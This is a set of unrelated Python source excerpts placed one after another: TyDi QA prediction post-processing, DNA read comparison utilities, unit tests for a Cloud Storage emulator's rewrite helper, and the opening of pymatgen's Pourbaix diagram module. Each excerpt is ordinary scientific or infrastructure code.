  return summary
# Byte-offset pair into the plaintext for a minimal answer span.  The end
# appears to be exclusive (`compute_predictions` builds it as last wordpiece
# offset + 1) — confirm against the eval script before relying on that.
Span = collections.namedtuple("Span", ["start_byte_offset", "end_byte_offset"])
class EvalExample(object):
    """Container for all evaluation data belonging to a single example.

    `features` and `results` start empty and are filled in, keyed by feature
    unique_id, while `compute_pred_dict` merges examples, features and raw
    results together.
    """

    def __init__(self, example_id, candidates):
        self.example_id = example_id
        self.candidates = candidates
        self.features = {}
        self.results = {}
# IMPROVE ME: This function and its children takes more than half the processing
# time and it's entirely outside the tf graph. We should take advantage of the
# fact that this is embarrassingly parallel and run in on many CPU threads.
# Pull requests welcome.
def compute_pred_dict(candidates_dict, dev_features, raw_results,
                      candidate_beam, max_answer_length):
  """Computes official answer key from raw logits.

  This function joins three pieces needed for eval script for each example,
  based on the unique_id:

  1. Examples, which come from the original JSON definition of the dataset;
     each has a unique `example_id`.
  2. Features, which are the windowed sequences of wordpieces given to the
     neural network graph (and may be smaller than a single passage);
     each has a `unique_id`.
  3. Raw results, which are the predictions coming from the execution of the
     neural network graph; each has a `unique_id`.

  Because of the way `unique_ids` are assigned by `CreateTFExampleFn`,
  all `unique_ids` associated with an `example_id` should numerically be sorted
  after that `example_id`. The `for` loop over `datum`s below takes advantage
  of this in order to merge these three things together.

  Finally, with all of these things available together, this function delegates
  to `compute_predictions(...)` to post-process the prediction for each example
  and turn it into the JSON prediction format expected by the eval script.

  Args:
    candidates_dict: A dictionary containing the annotations from jsonl file.
    dev_features: Features loaded from tf_record file.
    raw_results: Output from running tensorflow graph.
    candidate_beam: see FLAGS.candidate_beam.
    max_answer_length: see FLAGS.max_answer_length.

  Returns:
    A dictionary containing predictions.
  """
  logging.info("Post-processing predictions started.")
  raw_results_by_id = [(int(res["unique_id"] + 1), res) for res in raw_results]
  # Cast example id to int32 for each example, similarly to the raw results.
  # FIX: the session was previously created and never closed (resource leak);
  # using it as a context manager guarantees it is released, even on error.
  with tf.Session() as sess:
    all_candidates = candidates_dict.items()
    example_ids = tf.to_int32(np.array([int(k) for k, _ in all_candidates
                                       ])).eval(session=sess)
    examples_by_id = list(zip(example_ids, all_candidates))
    if not examples_by_id:
      raise ValueError("No examples candidates found.")
    feature_ids = []
    features = []
    for f in dev_features:
      # +1 mirrors the raw-results shift above so features sort after their
      # example id.
      feature_ids.append(
          f.features.feature["unique_ids"].int64_list.value[0] + 1)
      features.append(f.features.feature)
    feature_ids = tf.to_int32(np.array(feature_ids)).eval(session=sess)
  features_by_id = list(zip(feature_ids, features))
  # Join examples with features and raw results.
  eval_examples = []
  merged = sorted(
      examples_by_id + raw_results_by_id + features_by_id,
      key=lambda pair: pair[0])
  # Error counters
  num_failed_matches = 0
  ex_count = 0
  feature_count = 0
  result_count = 0
  # `feature_unique_id` is an example ID or an example ID with something
  # appended on the end of it such that it sorts after the appropriate
  # example ID (see `convert_examples_to_features`).
  for feature_unique_id, datum in merged:
    # if from `examples_by_id`
    if isinstance(datum, tuple):
      ex_count += 1
      eval_examples.append(
          EvalExample(example_id=datum[0], candidates=datum[1]))
    # if from `features_by_id`
    elif "wp_start_offset" in datum:
      feature_count += 1
      # Join with the example that we just appended above, by
      # adding to the `EvalExample`'s `features` dict.
      if not eval_examples:
        logging.warning("Expected to already have example for this example id. "
                        "Dataset / predictions mismatch?")
        num_failed_matches += 1
        continue
      eval_examples[-1].features[feature_unique_id] = datum
    # if from `raw_results_by_id`
    else:
      result_count += 1
      # Join with the example that we just appended above, by
      # adding to the `EvalExample`'s `results` dict.
      if not eval_examples:
        logging.warning("Expected to already have example for this example id. "
                        "Dataset / predictions mismatch?")
        num_failed_matches += 1
        continue
      eval_examples[-1].results[feature_unique_id] = datum
  logging.info(" Num candidate examples found: %d", ex_count)
  logging.info(" Num candidate features found: %d", feature_count)
  logging.info(" Num results found: %d", result_count)
  logging.info(" len(merged): %d", len(merged))
  if num_failed_matches > 0:
    logging.warning(" Num failed matches: %d", num_failed_matches)
  # Construct prediction objects.
  tydi_pred_dict = {}
  for i, eval_example in enumerate(eval_examples):
    if i % 10000 == 0:
      logging.info(" Computing predictions for input example: %d/%d", i,
                   len(eval_examples))
    summary = compute_predictions(eval_example, candidate_beam,
                                  max_answer_length)
    if summary is not None:
      tydi_pred_dict[eval_example.example_id] = summary.predicted_label
  return tydi_pred_dict
| |
from __future__ import division
from collections import defaultdict
from dark.utils import countPrint
try:
from itertools import zip_longest
except ImportError:
# zip_longest does not exist in Python 2.7 itertools. We should be able
# to get it via from six.moves import zip_longest according to
# https://pythonhosted.org/six/index.html?highlight=zip_longest but
# that doesn't work for me.
from itertools import izip_longest as zip_longest
# A list of the ambiguous values is given at
# https://en.wikipedia.org/wiki/Nucleic_acid_notation
# Maps each IUPAC nucleotide code to the set of unambiguous bases it can
# stand for; the four plain bases map to themselves.
AMBIGUOUS = {
    'A': {'A'},
    'C': {'C'},
    'G': {'G'},
    'T': {'T'},
    'M': {'A', 'C'},
    'R': {'A', 'G'},
    'W': {'A', 'T'},
    'S': {'G', 'C'},
    'K': {'G', 'T'},
    'Y': {'C', 'T'},
    'V': {'A', 'C', 'G'},
    'H': {'A', 'C', 'T'},
    'D': {'A', 'G', 'T'},
    'B': {'C', 'G', 'T'},
    'N': {'A', 'C', 'G', 'T'},
}
# Make a reverse version of AMBIGUOUS.
# Keys are the sorted concatenation of the base set (e.g. 'ACG' -> 'V'), so
# look-ups must use ''.join(sorted(bases)).
BASES_TO_AMBIGUOUS = dict(
    (''.join(sorted(bases)), symbol) for symbol, bases in AMBIGUOUS.items())
def matchToString(dnaMatch, read1, read2, matchAmbiguous=True, indent='',
                  offsets=None, includeGapLocations=True):
    """
    Format a DNA match as a string.

    @param dnaMatch: A C{dict} returned by C{compareDNAReads}.
    @param read1: A C{Read} instance or an instance of one of its subclasses.
    @param read2: A C{Read} instance or an instance of one of its subclasses.
    @param matchAmbiguous: If C{True}, ambiguous nucleotides that are
        possibly correct were counted as actually being correct. Otherwise,
        the match was done strictly, insisting that only non-ambiguous
        nucleotides could contribute to the matching nucleotide count.
    @param indent: A C{str} to indent all returned lines with.
    @param offsets: If not C{None}, a C{set} of offsets of interest that were
        only considered when making C{match}.
    @param includeGapLocations: If C{True} indicate the (1-based) locations of
        gaps.
    @return: A C{str} describing the match.
    """
    match = dnaMatch['match']
    identicalMatchCount = match['identicalMatchCount']
    ambiguousMatchCount = match['ambiguousMatchCount']
    gapMismatchCount = match['gapMismatchCount']
    gapGapMismatchCount = match['gapGapMismatchCount']
    nonGapMismatchCount = match['nonGapMismatchCount']

    # When a set of offsets was examined, percentages are relative to its
    # size rather than to the full read lengths.
    if offsets:
        len1 = len2 = len(offsets)
    else:
        len1 = len(read1)
        len2 = len(read2)

    lines = [
        countPrint('%sExact matches' % indent, identicalMatchCount,
                   len1, len2),
        countPrint('%sAmbiguous matches' % indent, ambiguousMatchCount,
                   len1, len2),
    ]

    if ambiguousMatchCount and identicalMatchCount:
        anyMatchCount = identicalMatchCount + ambiguousMatchCount
        lines.append(countPrint('%sExact or ambiguous matches' % indent,
                                anyMatchCount, len1, len2))

    mismatchCount = (gapMismatchCount + gapGapMismatchCount +
                     nonGapMismatchCount)
    lines.append(countPrint('%sMismatches' % indent, mismatchCount,
                            len1, len2))
    conflicts = 'conflicts' if matchAmbiguous else 'conflicts or ambiguities'
    lines.append(countPrint('%s Not involving gaps (i.e., %s)' % (indent,
                 conflicts), nonGapMismatchCount, len1, len2))
    lines.append(countPrint('%s Involving a gap in one sequence' % indent,
                            gapMismatchCount, len1, len2))
    lines.append(countPrint('%s Involving a gap in both sequences' % indent,
                            gapGapMismatchCount, len1, len2))

    # Per-read details, in read1, read2 order.
    for read, key in ((read1, 'read1'), (read2, 'read2')):
        lines.append('%s Id: %s' % (indent, read.id))
        length = len(read)
        lines.append('%s Length: %d' % (indent, length))
        gapCount = len(dnaMatch[key]['gapOffsets'])
        lines.append(countPrint('%s Gaps' % indent, gapCount, length))
        if includeGapLocations and gapCount:
            locations = ', '.join(
                str(gapOffset + 1)
                for gapOffset in sorted(dnaMatch[key]['gapOffsets']))
            lines.append(
                '%s Gap locations (1-based): %s' % (indent, locations))
        ambiguousCount = len(dnaMatch[key]['ambiguousOffsets'])
        lines.append(countPrint('%s Ambiguous' % indent, ambiguousCount,
                                length))
        extraCount = dnaMatch[key]['extraCount']
        if extraCount:
            lines.append(countPrint('%s Extra nucleotides at end' % indent,
                                    extraCount, length))

    return '\n'.join(lines)
def compareDNAReads(read1, read2, matchAmbiguous=True, gapChars='-',
                    offsets=None):
    """
    Compare two DNA sequences.

    @param read1: A C{Read} instance or an instance of one of its subclasses.
    @param read2: A C{Read} instance or an instance of one of its subclasses.
    @param matchAmbiguous: If C{True}, count ambiguous nucleotides that are
        possibly correct as actually being correct, and score these in the
        ambiguousMatchCount. Otherwise, we are strict and insist that only
        non-ambiguous nucleotides can contribute to the matching nucleotide
        count.
    @param gapChars: An object supporting __contains__ with characters that
        should be considered to be gaps.
    @param offsets: If not C{None}, a C{set} of offsets of interest. Offsets
        not in the set will not be considered.
    @return: A C{dict} with information about the match and the individual
        sequences (see below): a 'match' key holding the five match/mismatch
        counts, plus 'read1' and 'read2' keys each holding that read's
        ambiguous offsets, gap offsets, and count of extra trailing
        nucleotides.
    """
    identicalMatchCount = ambiguousMatchCount = 0
    gapMismatchCount = nonGapMismatchCount = gapGapMismatchCount = 0
    read1ExtraCount = read2ExtraCount = 0
    read1GapOffsets = []
    read2GapOffsets = []
    read1AmbiguousOffsets = []
    read2AmbiguousOffsets = []
    # Shared fallback for codes not in AMBIGUOUS (e.g. gap characters).
    empty = set()

    def _identicalMatch(a, b):
        # Identical means equal AND unambiguous: 'N' == 'N' is not an
        # identical match because AMBIGUOUS['N'] has four members.
        return a == b and len(AMBIGUOUS[a]) == 1

    def _ambiguousMatch(a, b, matchAmbiguous):
        """
        Checks if two characters match ambiguously if matchAmbiguous is True.

        A match is an ambiguous match if it is not an identical match, but the
        sets of ambiguous characters overlap.
        """
        return (matchAmbiguous and
                not _identicalMatch(a, b) and
                AMBIGUOUS.get(a, empty) & AMBIGUOUS.get(b, empty))

    # zip_longest pads the shorter sequence with None, which is how extra
    # trailing nucleotides in the longer read are detected below.
    for offset, (a, b) in enumerate(zip_longest(read1.sequence.upper(),
                                                read2.sequence.upper())):
        # Use 'is not None' in the following to allow an empty offsets set
        # to be passed.
        if offsets is not None and offset not in offsets:
            continue
        # Record ambiguity (more than one possible base) for each read,
        # regardless of whether the characters match.
        if len(AMBIGUOUS.get(a, '')) > 1:
            read1AmbiguousOffsets.append(offset)
        if len(AMBIGUOUS.get(b, '')) > 1:
            read2AmbiguousOffsets.append(offset)
        if a is None:
            # b has an extra character at its end (it cannot be None).
            assert b is not None
            read2ExtraCount += 1
            if b in gapChars:
                read2GapOffsets.append(offset)
        elif b is None:
            # a has an extra character at its end.
            read1ExtraCount += 1
            if a in gapChars:
                read1GapOffsets.append(offset)
        else:
            # We have a character from both sequences (they could still be
            # gap characters).
            if a in gapChars:
                read1GapOffsets.append(offset)
                if b in gapChars:
                    # Both are gaps. This can happen (though hopefully not
                    # if the sequences were pairwise aligned).
                    gapGapMismatchCount += 1
                    read2GapOffsets.append(offset)
                else:
                    # a is a gap, b is not.
                    gapMismatchCount += 1
            else:
                if b in gapChars:
                    # b is a gap, a is not.
                    gapMismatchCount += 1
                    read2GapOffsets.append(offset)
                else:
                    # Neither is a gap character.
                    if _identicalMatch(a, b):
                        identicalMatchCount += 1
                    elif _ambiguousMatch(a, b, matchAmbiguous):
                        ambiguousMatchCount += 1
                    else:
                        nonGapMismatchCount += 1

    return {
        'match': {
            'identicalMatchCount': identicalMatchCount,
            'ambiguousMatchCount': ambiguousMatchCount,
            'gapMismatchCount': gapMismatchCount,
            'gapGapMismatchCount': gapGapMismatchCount,
            'nonGapMismatchCount': nonGapMismatchCount,
        },
        'read1': {
            'ambiguousOffsets': read1AmbiguousOffsets,
            'extraCount': read1ExtraCount,
            'gapOffsets': read1GapOffsets,
        },
        'read2': {
            'ambiguousOffsets': read2AmbiguousOffsets,
            'extraCount': read2ExtraCount,
            'gapOffsets': read2GapOffsets,
        },
    }
def findKozakConsensus(read):
    """
    In a given DNA sequence, search for a Kozak consensus: (gcc)gccRccATGG.

    The upper case bases in that pattern are required, and the lower case
    bases are the ones most frequently found at the given positions. The
    initial 'gcc' sequence (in parentheses) is of uncertain significance
    and is not taken into account here.

    @param read: A C{DNARead} instance to be checked for Kozak consensi.
    @return: A generator that yields C{DNAKozakRead} instances.
    """
    from dark.reads import DNAKozakRead
    readLen = len(read)
    if readLen > 9:
        sequence = read.sequence
        # A candidate needs 6 bases of context before the ATG and one after
        # the G that follows it, hence this offset range.
        for offset in range(6, readLen - 3):
            if (sequence[offset:offset + 3] == 'ATG' and
                    sequence[offset + 3] == 'G' and
                    sequence[offset - 3] in 'GA'):
                # Count how many of the optional (lower-case) pattern
                # positions also agree.
                qualityCount = sum((
                    sequence[offset - 1] == 'C',
                    sequence[offset - 2] == 'C',
                    sequence[offset - 4] == 'C',
                    sequence[offset - 5] == 'C',
                    sequence[offset - 6] == 'G'))
                yield DNAKozakRead(read, offset - 6, offset + 4,
                                   qualityCount / 5.0 * 100)
class FloatBaseCounts(object):
    """
    Hold a floating point count of possible nucleotide bases.

    @param codes: An iterable of nucleotide codes.
    @param unknownAreAmbiguous: If C{True}, any unknown character (e.g., a '-'
        gap or '?' unknown base) will be treated as being fully ambiguous
        (i.e., could be any of ACGT). Otherwise, all unknown characters are
        collected under the count for '-'.
    """
    def __init__(self, codes, unknownAreAmbiguous=False):
        self.codes = list(map(str.upper, codes))
        self.unknownAreAmbiguous = unknownAreAmbiguous
        self.n = len(self.codes)
        counts = defaultdict(float)
        default = self._default = set('ACGT') if unknownAreAmbiguous else {'-'}
        # Each code contributes a total weight of 1.0, split evenly over the
        # bases it could represent (so 'M' adds 0.5 to 'A' and 0.5 to 'C').
        for code in self.codes:
            possible = AMBIGUOUS.get(code, default)
            frac = 1.0 / len(possible)
            for p in possible:
                counts[p] += frac
        # Sort first by base.
        _sorted = [(base, counts[base]) for base in sorted(counts)]

        # Then by count (reversed). Python's sort is stable, so bases with
        # equal counts remain in alphabetical order.
        def key(item):
            return item[1]

        self._sorted = sorted(_sorted, key=key, reverse=True)
        self.counts = counts

    def mostFrequent(self):
        """
        Which bases are the most frequent?

        @return: A C{set} of the most frequent bases.
        """
        maxCount = self._sorted[0][1]
        return set(base for base, count in self._sorted if count == maxCount)

    def highestFrequency(self):
        """
        What is the frequency of the most frequent base?

        @return: The C{float} frequency of the most common base.
        """
        # Zero or one distinct bases means the frequency is trivially 1.0.
        # This also avoids indexing an empty self._sorted when there were
        # no codes at all.
        if len(self.counts) < 2:
            return 1.0
        else:
            return self._sorted[0][1] / float(self.n)

    def homogeneous(self, level):
        """
        Does the most frequent base occurs at least C{level} fraction of the
        time?

        @param level: A C{float} fraction.
        @return: C{True} if the most common base occurs at least C{level}
            fraction of the time. If there are no bases at all, this is
            considered homogeneous.
        """
        return self.highestFrequency() >= level

    def __len__(self):
        # The number of distinct bases seen, not the number of input codes.
        return len(self.counts)

    def __str__(self):
        # Show integer counts without a decimal point; otherwise use two
        # decimal places. The overall highest frequency is appended.
        fmt = '%d' if all(c == int(c) for b, c in self._sorted) else '%.2f'
        return '%s (%.3f)' % (
            ' '.join(('%s:' + fmt) % (b, c) for b, c in self._sorted),
            self.highestFrequency())

    def variable(self, confirm=True):
        """
        Are the nucleotides variable?

        @param confirm: If C{True}, confirm that there is variability by
            looking at the ambiguous nucleotides. Else just report C{True}
            if there is more than one code (which might not indicate actual
            variability, since two codes could be ambiguous and have a
            nucleotide in common).
        @return: A C{bool}, C{True} only when variation is certain (under
            C{confirm}) or when more than one code is present (otherwise).
        """
        codes = self.codes
        if confirm:
            unambiguous = set()
            # Intersection of the possibility sets of all ambiguous codes
            # seen so far; None until the first ambiguous code.
            ambiguousIntersection = None
            default = self._default
            for code in codes:
                possible = AMBIGUOUS.get(code, default)
                if len(possible) == 1:
                    unambiguous.add(code)
                else:
                    if ambiguousIntersection is None:
                        ambiguousIntersection = set(possible)
                    else:
                        ambiguousIntersection.intersection_update(possible)
            if len(unambiguous) == 0:
                # There were no unambiguous nucleotide codes.
                # Sanity check: there must have been some ambiguous sites.
                assert ambiguousIntersection is not None
                if len(ambiguousIntersection) == 0:
                    # The ambiguous sites had nothing in common, so
                    # variation must exist (it cannot be determined what
                    # the variation is, but we don't care about that).
                    return True
                else:
                    # All the ambiguous sites have at least one nucleotide
                    # in common, so we can't be sure there's any variation.
                    pass
            elif len(unambiguous) == 1:
                # All the unambiguous sites agree. Do any of the ambiguous
                # sites (if any) not allow the unambiguous nucleotide in
                # their possibilities?
                if ambiguousIntersection is None:
                    # There were no ambiguous sites, so there's no
                    # variation here.
                    pass
                else:
                    # If any of the ambiguous sites excludes the single
                    # unambiguous nucleotide, then variation must exist.
                    nt = unambiguous.pop()
                    for code in codes:
                        possible = AMBIGUOUS.get(code, default)
                        if nt not in possible:
                            return True
            elif len(unambiguous) > 1:
                # Two different unambiguous codes: definitely variable.
                return True
        else:
            if len(codes) > 1:
                return True

        return False
def sequenceToRegex(sequence, wildcards='-?'):
    """
    Convert a potentially ambiguous DNA sequence into a regular expression.

    '?' and '-' are translated into [ACGT].

    @param sequence: A C{str} DNA sequence, possibly with ambiguous codes.
        Case insensitive.
    @param wildcards: A C{set} (or C{str}) with characters that should be
        translated to '[ACGT]'. Note that this happens only if the standard
        ambiguous lookup fails (the order could be changed one day if we need
        to override, or we could allow the passing of an ambiguity mapping).
        Wildcards are case sensitive.
    @raise KeyError: If any character in C{sequence} is unknown.
    @return: A C{str} regular expression with [...] for the ambiguous codes in
        C{sequence}.
    """
    pieces = []
    for base in sequence.upper():
        try:
            bases = ''.join(sorted(AMBIGUOUS[base]))
        except KeyError:
            # Not a recognized code: allow it only if it's a wildcard.
            if base not in wildcards:
                raise
            bases = 'ACGT'
        pieces.append('[%s]' % bases if len(bases) > 1 else bases)
    return ''.join(pieces)
| |
#!/usr/bin/env python3
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Rewrite helper (see gcs/rewrite.py)."""
import unittest
import unittest.mock
import grpc
from werkzeug.test import create_environ
from werkzeug.wrappers import Request
import gcs
from google.storage.v2 import storage_pb2
class TestRewrite(unittest.TestCase):
    """Unit tests for gcs.rewrite.Rewrite via the REST and gRPC paths."""

    MIN_REWRITE_BYTES = 1024 * 1024

    def _rewrite_from_rest(self, query_string):
        """Build a Rewrite via the REST initializer with fixed names."""
        environ = create_environ(
            base_url="http://localhost:8080",
            query_string=query_string,
        )
        return gcs.rewrite.Rewrite.init_rest(
            Request(environ),
            "source-bucket",
            "source-object",
            "destination-bucket",
            "destination-object",
        )

    def _rewrite_from_grpc(self, request):
        """Build a Rewrite via the gRPC initializer with a mock context."""
        return gcs.rewrite.Rewrite.init_grpc(request, unittest.mock.Mock())

    def _assert_names(self, rewrite):
        """Check the parsed source/destination bucket and object names."""
        self.assertEqual("source-bucket", rewrite.src_bucket_name)
        self.assertEqual("source-object", rewrite.src_object_name)
        self.assertEqual("destination-bucket", rewrite.dst_bucket_name)
        self.assertEqual("destination-object", rewrite.dst_object_name)

    def test_rewrite_rest(self):
        rewrite = self._rewrite_from_rest({})
        self._assert_names(rewrite)
        self.assertEqual(
            TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_rest_with_low_bytes(self):
        query = {
            "maxBytesRewrittenPerCall": int(TestRewrite.MIN_REWRITE_BYTES / 2)
        }
        rewrite = self._rewrite_from_rest(query)
        # Requests below the minimum are clamped up to MIN_REWRITE_BYTES.
        self.assertEqual(
            TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_rest_with_high_bytes(self):
        query = {
            "maxBytesRewrittenPerCall": TestRewrite.MIN_REWRITE_BYTES * 2
        }
        rewrite = self._rewrite_from_rest(query)
        self.assertEqual(
            2 * TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_grpc(self):
        request = storage_pb2.RewriteObjectRequest(
            destination_bucket="projects/_/buckets/destination-bucket",
            destination_name="destination-object",
            destination=storage_pb2.Object(
                metadata={"key": "value"},
            ),
            source_bucket="projects/_/buckets/source-bucket",
            source_object="source-object",
        )
        rewrite = self._rewrite_from_grpc(request)
        self._assert_names(rewrite)
        self.assertEqual(
            TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_grpc_no_destination_object(self):
        request = storage_pb2.RewriteObjectRequest(
            destination_bucket="projects/_/buckets/destination-bucket",
            destination_name="destination-object",
            source_bucket="projects/_/buckets/source-bucket",
            source_object="source-object",
        )
        rewrite = self._rewrite_from_grpc(request)
        self._assert_names(rewrite)
        self.assertEqual(
            TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_grpc_low_bytes(self):
        request = storage_pb2.RewriteObjectRequest(
            destination_bucket="projects/_/buckets/destination-bucket",
            destination_name="destination-object",
            source_bucket="projects/_/buckets/source-bucket",
            source_object="source-object",
            max_bytes_rewritten_per_call=int(TestRewrite.MIN_REWRITE_BYTES / 2),
        )
        rewrite = self._rewrite_from_grpc(request)
        self.assertEqual(
            TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_grpc_high_bytes(self):
        request = storage_pb2.RewriteObjectRequest(
            destination_bucket="projects/_/buckets/destination-bucket",
            destination_name="destination-object",
            source_bucket="projects/_/buckets/source-bucket",
            source_object="source-object",
            max_bytes_rewritten_per_call=int(2 * TestRewrite.MIN_REWRITE_BYTES),
        )
        rewrite = self._rewrite_from_grpc(request)
        self.assertEqual(
            2 * TestRewrite.MIN_REWRITE_BYTES, rewrite.max_bytes_rewritten_per_call
        )

    def test_rewrite_bad_requests(self):
        # Each malformed request should produce no Rewrite and a single
        # INVALID_ARGUMENT abort on the context.
        cases = {
            "missing destination": storage_pb2.RewriteObjectRequest(
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
            "bad destination.bucket [1]": storage_pb2.RewriteObjectRequest(
                destination_bucket="destination-bucket",
                destination_name="destination-object",
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
            "bad destination.bucket [2]": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/",
                destination_name="destination-object",
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
            "missing destination.name": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
            "bad source bucket [1]": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                destination_name="destination-object",
                source_bucket="source-bucket",
                source_object="source-object",
            ),
            "bad source_bucket [2]": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                destination_name="destination-object",
                source_bucket="projects/_/buckets/",
                source_object="source-object",
            ),
            "missing source_object": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                destination_name="destination-object",
                source_bucket="projects/_/buckets/source-bucket",
            ),
            "inconsistent object name": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                destination_name="destination-object",
                destination=storage_pb2.Object(
                    name="inconsistent-object-name",
                ),
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
            "inconsistent bucket name": storage_pb2.RewriteObjectRequest(
                destination_bucket="projects/_/buckets/destination-bucket",
                destination_name="destination-object",
                destination=storage_pb2.Object(
                    bucket="inconsistent-bucket-name",
                ),
                source_bucket="projects/_/buckets/source-bucket",
                source_object="source-object",
            ),
        }
        for description, request in cases.items():
            ctx = unittest.mock.Mock(name=description)
            rewrite = gcs.rewrite.Rewrite.init_grpc(request, ctx)
            self.assertIsNone(rewrite, msg=description)
            ctx.abort.assert_called_once_with(
                grpc.StatusCode.INVALID_ARGUMENT, unittest.mock.ANY
            )
# Allow running this test module directly (e.g. `python test_rewrite.py`).
if __name__ == "__main__":
    unittest.main()
| |
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module is intended to be used to compute Pourbaix diagrams
of arbitrary compositions and formation energies. If you use
this module in your work, please consider citing the following:
General formalism for solid-aqueous equilibria from DFT:
Persson et al., DOI: 10.1103/PhysRevB.85.235438
Decomposition maps, or Pourbaix hull diagrams
Singh et al., DOI: 10.1021/acs.chemmater.7b03980
Fast computation of many-element Pourbaix diagrams:
Patel et al., https://arxiv.org/abs/1909.00035 (submitted)
"""
import itertools
import logging
import re
import warnings
from copy import deepcopy
from functools import cmp_to_key, lru_cache, partial
from multiprocessing import Pool
from typing import Optional, Union, List, Dict
import numpy as np
from monty.json import MontyDecoder, MSONable
from scipy.spatial import ConvexHull, HalfspaceIntersection
try:
from scipy.special import comb
except ImportError:
from scipy.misc import comb
from pymatgen.analysis.phase_diagram import PDEntry, PhaseDiagram
from pymatgen.analysis.reaction_calculator import Reaction, ReactionError
from pymatgen.core.composition import Composition
from pymatgen.core.ion import Ion
from pymatgen.core.periodic_table import Element
from pymatgen.entries.compatibility import MU_H2O
from pymatgen.entries.computed_entries import ComputedEntry
from pymatgen.util.coord import Simplex
from pymatgen.util.plotting import pretty_plot
from pymatgen.util.string import Stringify
__author__ = "Sai Jayaraman"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.4"
__maintainer__ = "Joseph Montoya"
__credits__ = "Arunima Singh, Joseph Montoya, Anjli Patel"
__email__ = "joseph.montoya@tri.global"
__status__ = "Production"
__date__ = "Nov 1, 2012"
logger = logging.getLogger(__name__)

# Nernstian prefactor in V per pH unit / per log10(concentration) decade
# (2.303 RT/F, presumably evaluated at ~298 K -- confirm intended temperature).
PREFAC = 0.0591
# TODO: Revise to more closely reflect PDEntry, invoke from energy/composition
# TODO: PourbaixEntries depend implicitly on having entry energies be
# formation energies, should be a better way to get from raw energies
# TODO: uncorrected_energy is a bit of a misnomer, but not sure what to rename
class PourbaixEntry(MSONable, Stringify):
    """
    An object encompassing all data relevant to a solid or ion
    in a pourbaix diagram. Each bulk solid/ion has an energy
    g of the form: e = e0 + 0.0591 log10(conc) - nO mu_H2O
    + (nH - 2nO) pH + phi (-nH + 2nO + q)

    Note that the energies corresponding to the input entries
    should be formation energies with respect to hydrogen and
    oxygen gas in order for the pourbaix diagram formalism to
    work. This may be changed to be more flexible in the future.
    """

    def __init__(self, entry, entry_id=None, concentration=1e-6):
        """
        Args:
            entry (ComputedEntry/ComputedStructureEntry/PDEntry/IonEntry): An
                entry object
            entry_id (): Optional identifier for this entry. If omitted,
                ``entry.entry_id`` is used when present, otherwise None.
            concentration (): Ion concentration used in the concentration
                correction term; only meaningful for IonEntry inputs
                (solids are forced to 1.0).
        """
        self.entry = entry
        if isinstance(entry, IonEntry):
            self.concentration = concentration
            self.phase_type = "Ion"
            self.charge = entry.ion.charge
        else:
            # Solids carry no concentration dependence and no charge.
            self.concentration = 1.0
            self.phase_type = "Solid"
            self.charge = 0.0
        self.uncorrected_energy = entry.energy
        if entry_id is not None:
            self.entry_id = entry_id
        elif hasattr(entry, "entry_id") and entry.entry_id:
            self.entry_id = entry.entry_id
        else:
            self.entry_id = None

    @property
    def npH(self):
        """
        Returns: The number of H atoms minus twice the number of O atoms in
            the composition, i.e. the coefficient of the pH term in the
            free energy expression (see the class docstring).
        """
        return self.entry.composition.get("H", 0.0) - 2 * self.entry.composition.get("O", 0.0)

    @property
    def nH2O(self):
        """
        Returns: Number of H2O, taken as the number of O atoms in the
            composition.
        """
        return self.entry.composition.get("O", 0.0)

    @property
    def nPhi(self):
        """
        Returns: The coefficient of the applied potential phi in the free
            energy expression: npH minus the ion charge.
        """
        return self.npH - self.charge

    @property
    def name(self):
        """
        Returns: Name for entry. Solids get an "(s)" suffix on the reduced
            formula; ions use the underlying entry's name.
        """
        if self.phase_type == "Solid":
            return self.entry.composition.reduced_formula + "(s)"
        return self.entry.name

    @property
    def energy(self):
        """
        returns energy

        Returns (float): total energy of the pourbaix
            entry (at pH, V = 0 vs. SHE)
        """
        # Note: this implicitly depends on formation energies as input
        return self.uncorrected_energy + self.conc_term - (MU_H2O * self.nH2O)

    @property
    def energy_per_atom(self):
        """
        energy per atom of the pourbaix entry

        Returns (float): energy per atom
        """
        return self.energy / self.composition.num_atoms

    def energy_at_conditions(self, pH, V):
        """
        Get free energy for a given pH and V

        Args:
            pH (float): pH at which to evaluate free energy
            V (float): voltage at which to evaluate free energy

        Returns:
            free energy at conditions
        """
        return self.energy + self.npH * PREFAC * pH + self.nPhi * V

    def get_element_fraction(self, element):
        """
        Gets the elemental fraction of a given non-OH element

        Args:
            element (Element or str): string or element corresponding
                to element to get from composition

        Returns:
            fraction of element / sum(all non-OH elements)
        """
        return self.composition.get(element) * self.normalization_factor

    @property
    def normalized_energy(self):
        """
        Returns:
            energy normalized by number of non H or O atoms, e. g.
            for Zn2O6, energy / 2 or for AgTe3(OH)3, energy / 4
        """
